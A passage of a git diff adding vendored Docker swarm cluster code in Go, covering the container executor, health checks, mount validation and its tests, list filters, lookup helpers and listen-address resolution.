+				return nil, err
+			}
+
+			// TODO(aluzzardi): We're losing the port `name` here since
+			// there's no way to retrieve it back from the Engine.
+			exposedPorts = append(exposedPorts, &api.PortConfig{
+				PublishMode:   api.PublishModeHost,
+				Protocol:      protocol,
+				TargetPort:    uint32(port),
+				PublishedPort: uint32(hostPort),
+			})
+		}
+	}
+
+	return exposedPorts, nil
+}
+
+type exitError struct {
+	code  int
+	cause error
+}
+
+func (e *exitError) Error() string {
+	if e.cause != nil {
+		return fmt.Sprintf("task: non-zero exit (%v): %v", e.code, e.cause)
+	}
+
+	return fmt.Sprintf("task: non-zero exit (%v)", e.code)
+}
+
+func (e *exitError) ExitCode() int {
+	return int(e.code)
+}
+
+func (e *exitError) Cause() error {
+	return e.cause
+}
+
+// checkHealth blocks until unhealthy container is detected or ctx exits
+func (r *controller) checkHealth(ctx context.Context) error {
+	eventq := r.adapter.events(ctx)
+
+	for {
+		select {
+		case <-ctx.Done():
+			return nil
+		case <-r.closed:
+			return nil
+		case event := <-eventq:
+			if !r.matchevent(event) {
+				continue
+			}
+
+			switch event.Action {
+			case "health_status: unhealthy":
+				return ErrContainerUnhealthy
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
new file mode 100644
index 0000000000..63e1233566
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
@@ -0,0 +1,15 @@
+package container
+
+import "fmt"
+
+var (
+	// ErrImageRequired returned if a task is missing the image definition.
+	ErrImageRequired = fmt.Errorf("dockerexec: image required")
+
+	// ErrContainerDestroyed returned when a container is prematurely destroyed
+	// during a wait call.
+	ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed")
+
+	// ErrContainerUnhealthy returned if controller detects the health check failure
+	ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container")
+)
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
new file mode 100644
index 0000000000..f0dedd4530
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
@@ -0,0 +1,194 @@
+package container
+
+import (
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
+	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	networktypes "github.com/docker/libnetwork/types"
+	"github.com/docker/swarmkit/agent/exec"
+	"github.com/docker/swarmkit/agent/secrets"
+	"github.com/docker/swarmkit/api"
+	"golang.org/x/net/context"
+)
+
+type executor struct {
+	backend executorpkg.Backend
+	secrets exec.SecretsManager
+}
+
+// NewExecutor returns an executor from the docker client.
+func NewExecutor(b executorpkg.Backend) exec.Executor {
+	return &executor{
+		backend: b,
+		secrets: secrets.NewManager(),
+	}
+}
+
+// Describe returns the underlying node description from the docker client.
+func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) {
+	info, err := e.backend.SystemInfo()
+	if err != nil {
+		return nil, err
+	}
+
+	plugins := map[api.PluginDescription]struct{}{}
+	addPlugins := func(typ string, names []string) {
+		for _, name := range names {
+			plugins[api.PluginDescription{
+				Type: typ,
+				Name: name,
+			}] = struct{}{}
+		}
+	}
+
+	// add v1 plugins
+	addPlugins("Volume", info.Plugins.Volume)
+	// Add builtin driver "overlay" (the only builtin multi-host driver) to
+	// the plugin list by default.
+	addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...))
+	addPlugins("Authorization", info.Plugins.Authorization)
+
+	// add v2 plugins
+	v2Plugins, err := e.backend.PluginManager().List()
+	if err == nil {
+		for _, plgn := range v2Plugins {
+			for _, typ := range plgn.Config.Interface.Types {
+				if typ.Prefix != "docker" || !plgn.Enabled {
+					continue
+				}
+				plgnTyp := typ.Capability
+				if typ.Capability == "volumedriver" {
+					plgnTyp = "Volume"
+				} else if typ.Capability == "networkdriver" {
+					plgnTyp = "Network"
+				}
+				plugins[api.PluginDescription{
+					Type: plgnTyp,
+					Name: plgn.Name,
+				}] = struct{}{}
+			}
+		}
+	}
+
+	pluginFields := make([]api.PluginDescription, 0, len(plugins))
+	for k := range plugins {
+		pluginFields = append(pluginFields, k)
+	}
+
+	sort.Sort(sortedPlugins(pluginFields))
+
+	// parse []string labels into a map[string]string
+	labels := map[string]string{}
+	for _, l := range info.Labels {
+		stringSlice := strings.SplitN(l, "=", 2)
+		// this will take the last value in the list for a given key
+		// ideally, one shouldn't assign multiple values to the same key
+		if len(stringSlice) > 1 {
+			labels[stringSlice[0]] = stringSlice[1]
+		}
+	}
+
+	description := &api.NodeDescription{
+		Hostname: info.Name,
+		Platform: &api.Platform{
+			Architecture: info.Architecture,
+			OS:           info.OSType,
+		},
+		Engine: &api.EngineDescription{
+			EngineVersion: info.ServerVersion,
+			Labels:        labels,
+			Plugins:       pluginFields,
+		},
+		Resources: &api.Resources{
+			NanoCPUs:    int64(info.NCPU) * 1e9,
+			MemoryBytes: info.MemTotal,
+		},
+	}
+
+	return description, nil
+}
+
+func (e *executor) Configure(ctx context.Context, node *api.Node) error {
+	na := node.Attachment
+	if na == nil {
+		return nil
+	}
+
+	options := types.NetworkCreate{
+		Driver: na.Network.DriverState.Name,
+		IPAM: &network.IPAM{
+			Driver: na.Network.IPAM.Driver.Name,
+		},
+		Options:        na.Network.DriverState.Options,
+		CheckDuplicate: true,
+	}
+
+	for _, ic := range na.Network.IPAM.Configs {
+		c := network.IPAMConfig{
+			Subnet:  ic.Subnet,
+			IPRange: ic.Range,
+			Gateway: ic.Gateway,
+		}
+		options.IPAM.Config = append(options.IPAM.Config, c)
+	}
+
+	return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{
+		na.Network.ID,
+		types.NetworkCreateRequest{
+			Name:          na.Network.Spec.Annotations.Name,
+			NetworkCreate: options,
+		},
+	}, na.Addresses[0])
+}
+
+// Controller returns a docker container runner.
+func (e *executor) Controller(t *api.Task) (exec.Controller, error) {
+	if t.Spec.GetAttachment() != nil {
+		return newNetworkAttacherController(e.backend, t, e.secrets)
+	}
+
+	ctlr, err := newController(e.backend, t, e.secrets)
+	if err != nil {
+		return nil, err
+	}
+
+	return ctlr, nil
+}
+
+func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error {
+	nwKeys := []*networktypes.EncryptionKey{}
+	for _, key := range keys {
+		nwKey := &networktypes.EncryptionKey{
+			Subsystem:   key.Subsystem,
+			Algorithm:   int32(key.Algorithm),
+			Key:         make([]byte, len(key.Key)),
+			LamportTime: key.LamportTime,
+		}
+		copy(nwKey.Key, key.Key)
+		nwKeys = append(nwKeys, nwKey)
+	}
+	e.backend.SetNetworkBootstrapKeys(nwKeys)
+
+	return nil
+}
+
+func (e *executor) Secrets() exec.SecretsManager {
+	return e.secrets
+}
+
+type sortedPlugins []api.PluginDescription
+
+func (sp sortedPlugins) Len() int { return len(sp) }
+
+func (sp sortedPlugins) Swap(i, j int) { sp[i], sp[j] = sp[j], sp[i] }
+
+func (sp sortedPlugins) Less(i, j int) bool {
+	if sp[i].Type != sp[j].Type {
+		return sp[i].Type < sp[j].Type
+	}
+	return sp[i].Name < sp[j].Name
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
new file mode 100644
index 0000000000..99cf7502af
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
@@ -0,0 +1,102 @@
+// +build !windows
+
+package container
+
+import (
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/daemon/events"
+	"github.com/docker/swarmkit/api"
+	"golang.org/x/net/context"
+)
+
+func TestHealthStates(t *testing.T) {
+
+	// set up environment: events, task, container ....
+	e := events.New()
+	_, l, _ := e.Subscribe()
+	defer e.Evict(l)
+
+	task := &api.Task{
+		ID:        "id",
+		ServiceID: "sid",
+		Spec: api.TaskSpec{
+			Runtime: &api.TaskSpec_Container{
+				Container: &api.ContainerSpec{
+					Image: "image_name",
+					Labels: map[string]string{
+						"com.docker.swarm.task.id": "id",
+					},
+				},
+			},
+		},
+		Annotations: api.Annotations{Name: "name"},
+	}
+
+	c := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "id",
+			Name: "name",
+			Config: &containertypes.Config{
+				Image: "image_name",
+				Labels: map[string]string{
+					"com.docker.swarm.task.id": "id",
+				},
+			},
+		},
+	}
+
+	daemon := &daemon.Daemon{
+		EventsService: e,
+	}
+
+	controller, err := newController(daemon, task, nil)
+	if err != nil {
+		t.Fatalf("create controller fail %v", err)
+	}
+
+	errChan := make(chan error, 1)
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+
+	// fire checkHealth
+	go func() {
+		err := controller.checkHealth(ctx)
+		select {
+		case errChan <- err:
+		case <-ctx.Done():
+		}
+	}()
+
+	// send an event and expect to get expectedErr
+	// if expectedErr is nil, shouldn't get any error
+	logAndExpect := func(msg string, expectedErr error) {
+		daemon.LogContainerEvent(c, msg)
+
+		timer := time.NewTimer(1 * time.Second)
+		defer timer.Stop()
+
+		select {
+		case err := <-errChan:
+			if err != expectedErr {
+				t.Fatalf("expect error %v, but get %v", expectedErr, err)
+			}
+		case <-timer.C:
+			if expectedErr != nil {
+				t.Fatalf("time limit exceeded, didn't get expected error")
+			}
+		}
+	}
+
+	// events that are ignored by checkHealth
+	logAndExpect("health_status: running", nil)
+	logAndExpect("health_status: healthy", nil)
+	logAndExpect("die", nil)
+
+	// unhealthy event will be caught by checkHealth
+	logAndExpect("health_status: unhealthy", ErrContainerUnhealthy)
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
new file mode 100644
index 0000000000..5fda1f2edb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
@@ -0,0 +1,39 @@
+package container
+
+import (
+	"fmt"
+	"path/filepath"
+
+	"github.com/docker/swarmkit/api"
+)
+
+func validateMounts(mounts []api.Mount) error {
+	for _, mount := range mounts {
+		// Target must always be absolute
+		if !filepath.IsAbs(mount.Target) {
+			return fmt.Errorf("invalid mount target, must be an absolute path: %s", mount.Target)
+		}
+
+		switch mount.Type {
+		// The checks on abs paths are required due to the container API confusing
+		// volume mounts as bind mounts when the source is absolute (and vice-versa)
+		// See #25253
+		// TODO: This is probably not necessary once #22373 is merged
+		case api.MountTypeBind:
+			if !filepath.IsAbs(mount.Source) {
+				return fmt.Errorf("invalid bind mount source, must be an absolute path: %s", mount.Source)
+			}
+		case api.MountTypeVolume:
+			if filepath.IsAbs(mount.Source) {
+				return fmt.Errorf("invalid volume mount source, must not be an absolute path: %s", mount.Source)
+			}
+		case api.MountTypeTmpfs:
+			if mount.Source != "" {
+				return fmt.Errorf("invalid tmpfs source, source must be empty")
+			}
+		default:
+			return fmt.Errorf("invalid mount type: %s", mount.Type)
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
new file mode 100644
index 0000000000..9d98e2c008
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
@@ -0,0 +1,141 @@
+package container
+
+import (
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/swarmkit/api"
+)
+
+func newTestControllerWithMount(m api.Mount) (*controller, error) {
+	return newController(&daemon.Daemon{}, &api.Task{
+		ID:        stringid.GenerateRandomID(),
+		ServiceID: stringid.GenerateRandomID(),
+		Spec: api.TaskSpec{
+			Runtime: &api.TaskSpec_Container{
+				Container: &api.ContainerSpec{
+					Image: "image_name",
+					Labels: map[string]string{
+						"com.docker.swarm.task.id": "id",
+					},
+					Mounts: []api.Mount{m},
+				},
+			},
+		},
+	}, nil)
+}
+
+func TestControllerValidateMountBind(t *testing.T) {
+	// with improper source
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeBind,
+		Source: "foo",
+		Target: testAbsPath,
+	}); err == nil || !strings.Contains(err.Error(), "invalid bind mount source") {
+		t.Fatalf("expected  error, got: %v", err)
+	}
+
+	// with non-existing source
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeBind,
+		Source: testAbsNonExistent,
+		Target: testAbsPath,
+	}); err != nil {
+		t.Fatalf("controller should not error at creation: %v", err)
+	}
+
+	// with proper source
+	tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountBind")
+	if err != nil {
+		t.Fatalf("failed to create temp dir: %v", err)
+	}
+	defer os.Remove(tmpdir)
+
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeBind,
+		Source: tmpdir,
+		Target: testAbsPath,
+	}); err != nil {
+		t.Fatalf("expected  error, got: %v", err)
+	}
+}
+
+func TestControllerValidateMountVolume(t *testing.T) {
+	// with improper source
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeVolume,
+		Source: testAbsPath,
+		Target: testAbsPath,
+	}); err == nil || !strings.Contains(err.Error(), "invalid volume mount source") {
+		t.Fatalf("expected error, got: %v", err)
+	}
+
+	// with proper source
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeVolume,
+		Source: "foo",
+		Target: testAbsPath,
+	}); err != nil {
+		t.Fatalf("expected error, got: %v", err)
+	}
+}
+
+func TestControllerValidateMountTarget(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "TestControllerValidateMountTarget")
+	if err != nil {
+		t.Fatalf("failed to create temp dir: %v", err)
+	}
+	defer os.Remove(tmpdir)
+
+	// with improper target
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeBind,
+		Source: testAbsPath,
+		Target: "foo",
+	}); err == nil || !strings.Contains(err.Error(), "invalid mount target") {
+		t.Fatalf("expected error, got: %v", err)
+	}
+
+	// with proper target
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeBind,
+		Source: tmpdir,
+		Target: testAbsPath,
+	}); err != nil {
+		t.Fatalf("expected no error, got: %v", err)
+	}
+}
+
+func TestControllerValidateMountTmpfs(t *testing.T) {
+	// with improper target
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeTmpfs,
+		Source: "foo",
+		Target: testAbsPath,
+	}); err == nil || !strings.Contains(err.Error(), "invalid tmpfs source") {
+		t.Fatalf("expected error, got: %v", err)
+	}
+
+	// with proper target
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.MountTypeTmpfs,
+		Target: testAbsPath,
+	}); err != nil {
+		t.Fatalf("expected no error, got: %v", err)
+	}
+}
+
+func TestControllerValidateMountInvalidType(t *testing.T) {
+	// with improper target
+	if _, err := newTestControllerWithMount(api.Mount{
+		Type:   api.Mount_MountType(9999),
+		Source: "foo",
+		Target: testAbsPath,
+	}); err == nil || !strings.Contains(err.Error(), "invalid mount type") {
+		t.Fatalf("expected error, got: %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
new file mode 100644
index 0000000000..c616eeef93
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package container
+
+const (
+	testAbsPath        = "/foo"
+	testAbsNonExistent = "/some-non-existing-host-path/"
+)
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
new file mode 100644
index 0000000000..c346451d3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
@@ -0,0 +1,8 @@
+// +build windows
+
+package container
+
+const (
+	testAbsPath        = `c:\foo`
+	testAbsNonExistent = `c:\some-non-existing-host-path\`
+)
diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go
new file mode 100644
index 0000000000..88668edaac
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go
@@ -0,0 +1,116 @@
+package cluster
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types/filters"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	swarmapi "github.com/docker/swarmkit/api"
+)
+
+func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filters, error) {
+	accepted := map[string]bool{
+		"name":       true,
+		"id":         true,
+		"label":      true,
+		"role":       true,
+		"membership": true,
+	}
+	if err := filter.Validate(accepted); err != nil {
+		return nil, err
+	}
+	f := &swarmapi.ListNodesRequest_Filters{
+		NamePrefixes: filter.Get("name"),
+		IDPrefixes:   filter.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
+	}
+
+	for _, r := range filter.Get("role") {
+		if role, ok := swarmapi.NodeRole_value[strings.ToUpper(r)]; ok {
+			f.Roles = append(f.Roles, swarmapi.NodeRole(role))
+		} else if r != "" {
+			return nil, fmt.Errorf("Invalid role filter: '%s'", r)
+		}
+	}
+
+	for _, a := range filter.Get("membership") {
+		if membership, ok := swarmapi.NodeSpec_Membership_value[strings.ToUpper(a)]; ok {
+			f.Memberships = append(f.Memberships, swarmapi.NodeSpec_Membership(membership))
+		} else if a != "" {
+			return nil, fmt.Errorf("Invalid membership filter: '%s'", a)
+		}
+	}
+
+	return f, nil
+}
+
+func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) {
+	accepted := map[string]bool{
+		"name":  true,
+		"id":    true,
+		"label": true,
+	}
+	if err := filter.Validate(accepted); err != nil {
+		return nil, err
+	}
+	return &swarmapi.ListServicesRequest_Filters{
+		NamePrefixes: filter.Get("name"),
+		IDPrefixes:   filter.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
+	}, nil
+}
+
+func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) {
+	accepted := map[string]bool{
+		"name":          true,
+		"id":            true,
+		"label":         true,
+		"service":       true,
+		"node":          true,
+		"desired-state": true,
+	}
+	if err := filter.Validate(accepted); err != nil {
+		return nil, err
+	}
+	if transformFunc != nil {
+		if err := transformFunc(filter); err != nil {
+			return nil, err
+		}
+	}
+	f := &swarmapi.ListTasksRequest_Filters{
+		NamePrefixes: filter.Get("name"),
+		IDPrefixes:   filter.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
+		ServiceIDs:   filter.Get("service"),
+		NodeIDs:      filter.Get("node"),
+	}
+
+	for _, s := range filter.Get("desired-state") {
+		if state, ok := swarmapi.TaskState_value[strings.ToUpper(s)]; ok {
+			f.DesiredStates = append(f.DesiredStates, swarmapi.TaskState(state))
+		} else if s != "" {
+			return nil, fmt.Errorf("Invalid desired-state filter: '%s'", s)
+		}
+	}
+
+	return f, nil
+}
+
+func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Filters, error) {
+	accepted := map[string]bool{
+		"names": true,
+		"name":  true,
+		"id":    true,
+		"label": true,
+	}
+	if err := filter.Validate(accepted); err != nil {
+		return nil, err
+	}
+	return &swarmapi.ListSecretsRequest_Filters{
+		Names:        filter.Get("names"),
+		NamePrefixes: filter.Get("name"),
+		IDPrefixes:   filter.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go
new file mode 100644
index 0000000000..be5bf56e87
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go
@@ -0,0 +1,108 @@
+package cluster
+
+import (
+	"fmt"
+
+	swarmapi "github.com/docker/swarmkit/api"
+	"golang.org/x/net/context"
+)
+
+func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) {
+	rl, err := c.ListClusters(ctx, &swarmapi.ListClustersRequest{})
+	if err != nil {
+		return nil, err
+	}
+
+	if len(rl.Clusters) == 0 {
+		return nil, fmt.Errorf("swarm not found")
+	}
+
+	// TODO: assume one cluster only
+	return rl.Clusters[0], nil
+}
+
+func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) {
+	// GetNode to match via full ID.
+	rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input})
+	if err != nil {
+		// If any error (including NotFound), ListNodes to match via full name.
+		rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}})
+
+		if err != nil || len(rl.Nodes) == 0 {
+			// If any error or 0 result, ListNodes to match via ID prefix.
+			rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}})
+		}
+
+		if err != nil {
+			return nil, err
+		}
+
+		if len(rl.Nodes) == 0 {
+			return nil, fmt.Errorf("node %s not found", input)
+		}
+
+		if l := len(rl.Nodes); l > 1 {
+			return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l)
+		}
+
+		return rl.Nodes[0], nil
+	}
+	return rg.Node, nil
+}
+
+func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) {
+	// GetService to match via full ID.
+	rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input})
+	if err != nil {
+		// If any error (including NotFound), ListServices to match via full name.
+		rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}})
+		if err != nil || len(rl.Services) == 0 {
+			// If any error or 0 result, ListServices to match via ID prefix.
+			rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}})
+		}
+
+		if err != nil {
+			return nil, err
+		}
+
+		if len(rl.Services) == 0 {
+			return nil, fmt.Errorf("service %s not found", input)
+		}
+
+		if l := len(rl.Services); l > 1 {
+			return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l)
+		}
+
+		return rl.Services[0], nil
+	}
+	return rg.Service, nil
+}
+
+func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) {
+	// GetTask to match via full ID.
+	rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input})
+	if err != nil {
+		// If any error (including NotFound), ListTasks to match via full name.
+		rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}})
+
+		if err != nil || len(rl.Tasks) == 0 {
+			// If any error or 0 result, ListTasks to match via ID prefix.
+			rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}})
+		}
+
+		if err != nil {
+			return nil, err
+		}
+
+		if len(rl.Tasks) == 0 {
+			return nil, fmt.Errorf("task %s not found", input)
+		}
+
+		if l := len(rl.Tasks); l > 1 {
+			return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l)
+		}
+
+		return rl.Tasks[0], nil
+	}
+	return rg.Task, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
new file mode 100644
index 0000000000..c24d4865b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
@@ -0,0 +1,278 @@
+package cluster
+
+import (
+	"errors"
+	"fmt"
+	"net"
+)
+
+var (
+	errNoSuchInterface         = errors.New("no such interface")
+	errNoIP                    = errors.New("could not find the system's IP address")
+	errMustSpecifyListenAddr   = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified")
+	errBadListenAddr           = errors.New("listen address must be an IP address or network interface (with optional port number)")
+	errBadAdvertiseAddr        = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)")
+	errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)")
+)
+
+func resolveListenAddr(specifiedAddr string) (string, string, error) {
+	specifiedHost, specifiedPort, err := net.SplitHostPort(specifiedAddr)
+	if err != nil {
+		return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr)
+	}
+
+	// Does the host component match any of the interface names on the
+	// system? If so, use the address from that interface.
+	interfaceAddr, err := resolveInterfaceAddr(specifiedHost)
+	if err == nil {
+		return interfaceAddr.String(), specifiedPort, nil
+	}
+	if err != errNoSuchInterface {
+		return "", "", err
+	}
+
+	// If it's not an interface, it must be an IP (for now)
+	if net.ParseIP(specifiedHost) == nil {
+		return "", "", errBadListenAddr
+	}
+
+	return specifiedHost, specifiedPort, nil
+}
+
+func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) {
+	// Approach:
+	// - If an advertise address is specified, use that. Resolve the
+	//   interface's address if an interface was specified in
+	//   advertiseAddr. Fill in the port from listenAddrPort if necessary.
+	// - If DefaultAdvertiseAddr is not empty, use that with the port from
+	//   listenAddrPort. Resolve the interface's address from
+	//   if an interface name was specified in DefaultAdvertiseAddr.
+	// - Otherwise, try to autodetect the system's address. Use the port in
+	//   listenAddrPort with this address if autodetection succeeds.
+
+	if advertiseAddr != "" {
+		advertiseHost, advertisePort, err := net.SplitHostPort(advertiseAddr)
+		if err != nil {
+			// Not a host:port specification
+			advertiseHost = advertiseAddr
+			advertisePort = listenAddrPort
+		}
+
+		// Does the host component match any of the interface names on the
+		// system? If so, use the address from that interface.
+		interfaceAddr, err := resolveInterfaceAddr(advertiseHost)
+		if err == nil {
+			return interfaceAddr.String(), advertisePort, nil
+		}
+		if err != errNoSuchInterface {
+			return "", "", err
+		}
+
+		// If it's not an interface, it must be an IP (for now)
+		if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() {
+			return "", "", errBadAdvertiseAddr
+		}
+
+		return advertiseHost, advertisePort, nil
+	}
+
+	if c.config.DefaultAdvertiseAddr != "" {
+		// Does the default advertise address component match any of the
+		// interface names on the system? If so, use the address from
+		// that interface.
+		interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr)
+		if err == nil {
+			return interfaceAddr.String(), listenAddrPort, nil
+		}
+		if err != errNoSuchInterface {
+			return "", "", err
+		}
+
+		// If it's not an interface, it must be an IP (for now)
+		if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() {
+			return "", "", errBadDefaultAdvertiseAddr
+		}
+
+		return c.config.DefaultAdvertiseAddr, listenAddrPort, nil
+	}
+
+	systemAddr, err := c.resolveSystemAddr()
+	if err != nil {
+		return "", "", err
+	}
+	return systemAddr.String(), listenAddrPort, nil
+}
+
+func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) {
+	// Use a specific interface's IP address.
+	intf, err := net.InterfaceByName(specifiedInterface)
+	if err != nil {
+		return nil, errNoSuchInterface
+	}
+
+	addrs, err := intf.Addrs()
+	if err != nil {
+		return nil, err
+	}
+
+	var interfaceAddr4, interfaceAddr6 net.IP
+
+	for _, addr := range addrs {
+		ipAddr, ok := addr.(*net.IPNet)
+
+		if ok {
+			if ipAddr.IP.To4() != nil {
+				// IPv4
+				if interfaceAddr4 != nil {
+					return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP)
+				}
+				interfaceAddr4 = ipAddr.IP
+			} else {
+				// IPv6
+				if interfaceAddr6 != nil {
+					return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP)
+				}
+				interfaceAddr6 = ipAddr.IP
+			}
+		}
+	}
+
+	if interfaceAddr4 == nil && interfaceAddr6 == nil {
+		return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface)
+	}
+
+	// In the case that there's exactly one IPv4 address
+	// and exactly one IPv6 address, favor IPv4 over IPv6.
+	if interfaceAddr4 != nil {
+		return interfaceAddr4, nil
+	}
+	return interfaceAddr6, nil
+}
+
+func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) {
+	// Use the system's only IP address, or fail if there are
+	// multiple addresses to choose from. Skip interfaces which
+	// are managed by docker via subnet check.
+	interfaces, err := net.Interfaces()
+	if err != nil {
+		return nil, err
+	}
+
+	var systemAddr net.IP
+	var systemInterface string
+
+	// List Docker-managed subnets
+	v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets()
+	v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets()
+
+ifaceLoop:
+	for _, intf := range interfaces {
+		// Skip inactive interfaces and loopback interfaces
+		if (intf.Flags&net.FlagUp == 0) || (intf.Flags&net.FlagLoopback) != 0 {
+			continue
+		}
+
+		addrs, err := intf.Addrs()
+		if err != nil {
+			continue
+		}
+
+		var interfaceAddr4, interfaceAddr6 net.IP
+
+		for _, addr := range addrs {
+			ipAddr, ok := addr.(*net.IPNet)
+
+			// Skip loopback and link-local addresses
+			if !ok || !ipAddr.IP.IsGlobalUnicast() {
+				continue
+			}
+
+			if ipAddr.IP.To4() != nil {
